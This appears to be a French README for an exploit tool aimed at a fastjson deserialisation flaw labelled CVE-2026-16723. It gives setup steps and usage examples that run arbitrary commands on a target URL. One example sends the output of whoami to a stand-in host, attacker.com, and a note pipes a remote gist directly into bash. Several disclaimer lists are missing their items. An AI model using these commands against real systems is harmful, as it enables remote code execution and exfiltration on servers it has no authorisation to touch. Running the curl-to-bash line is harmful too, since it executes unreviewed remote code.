
Soutenez la maintenance de ce projet via PayPal ou en scannant le code QR ci-dessous.
N'utilisez ce projet que dans des environnements sûrs et autorisés, tels que :
Exemple de configuration :
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723
# Télécharger le JAR fastjson (optionnel - le script le téléchargera automatiquement)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar
# Le projet utilise Python, voir ci-dessous
# Créer un environnement virtuel
python -m venv venv
# Activer l'environnement virtuel
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Installer les dépendances
pip install -r requirements.txt
Exemple d'utilisation :
# Exploit de base
python CVE-2026-16723.py -t http://localhost:8080/parse
# Commande personnalisée
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"
# Avec IP et port personnalisés
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000
# Cible HTTPS
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure
# Utilisation d'un proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080
# Plage FD personnalisée
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50
# Mode silencieux
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet
Remarque :
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y pour supprimer le répertoire .git imbriquéUn référentiel pour apprendre, tester et rechercher des concepts de cybersécurité dans des environnements contrôlés.
Ce référentiel est destiné uniquement à la recherche en sécurité à but éducatif et autorisé.
Il est conçu pour aider les utilisateurs à en apprendre davantage sur :
N'utilisez ce référentiel que dans des environnements où vous disposez d'une autorisation, tels que :
Toute utilisation non autorisée ou illégale est strictement interdite.
L'auteur et les contributeurs ne sont pas responsables des dommages, utilisations abusives, problèmes juridiques ou pertes causés par ce projet.
En utilisant ce référentiel, vous acceptez que :
Ce projet est destiné à :
Veuillez suivre les pratiques de divulgation responsable et vous conformer à toutes les lois applicables.
Pour une divulgation responsable ou une collaboration, contactez le mainteneur du référentiel via GitHub.